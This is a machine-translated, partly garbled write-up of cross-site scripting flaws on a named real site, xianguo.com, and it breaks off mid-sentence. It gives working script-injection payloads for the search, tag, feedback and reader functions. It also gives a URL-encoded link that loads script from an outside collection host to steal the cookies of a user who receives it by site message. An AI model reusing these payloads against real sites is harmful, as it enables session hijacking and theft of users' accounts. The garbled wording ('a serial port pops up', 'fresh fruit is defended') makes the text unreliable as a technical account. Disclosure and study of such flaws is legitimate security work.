1) stored xss, which harms your understanding; 1.1) stored xss in the publishing function; the title is well filtered, but the text content is not filtered by the label, xss code can be inserted to all publishing function texts. For example, we can insert the following content into the text content; test 1.2) stored xss in tag settings. In this case, fresh fruit is defended and cannot be entered. "<"; well, if you don't want to input it, copy and paste it; we copied the prepared xss code directly. After some attempts, we found that the <script> tag can be filtered only once, the xss code under the tag can quietly lie there waiting for the promotion; 2) reflective xss2.1) search function xss; come to the search function, first, enter ">" to test and find the missing bird. Well, this is much easier. directly construct the following code: "> <script> alert (document. cookie) </script> <input for testing; 2.2) DOM + reflected xss in the feedback function; click feedback and we notice the features of the page, the tags content in the url exactly corresponds to the TAG content. Okay, open the browser for debugging, and insert the xss code directly after the tags content; <script> alert (/2 /) </script> after a url request is submitted, a window is displayed. 2.3) the reader function constructs the reflection xss. The reader function page displays the following url: http://xianguo.com/reader#PageMgr.goIndexPage () A function is directly referenced in the url. Can I use it to construct the following link for direct submission; http://xianguo.com/reader#PageMgr.goIndexPage (Alert (/xss/), and a serial port pops up. 3) Use reflected xss to steal user cookies. 3.1) do not underestimate reflected xss, it can also be used under certain conditions; 3.2) Fresh Fruit network has a station text message function. I wonder if I can combine this function with reflective xss to play a role, send the following reflective xss link to user B; http://xianguo.com/search?searchType=all&keyword=%22%3E%3C%73%63%72%69%70%74%2F%73%72%63%3D%68%74%74%70%3A%2F%2F%78%73%73%65%72%2E%6D%65%2F%57%36%58%5A%50%78%3F%31%33%35%33%30%37%33%33%32%34%3E%3C%2F%73%63%72%69%70%74%3E3.3 ) Log on to user B to view the short message and find that the fresh fruit students did not process some sensitive characters in the link, but directly transmitted to user B as is; 3.4) if the uninformed user, access the link we sent, so...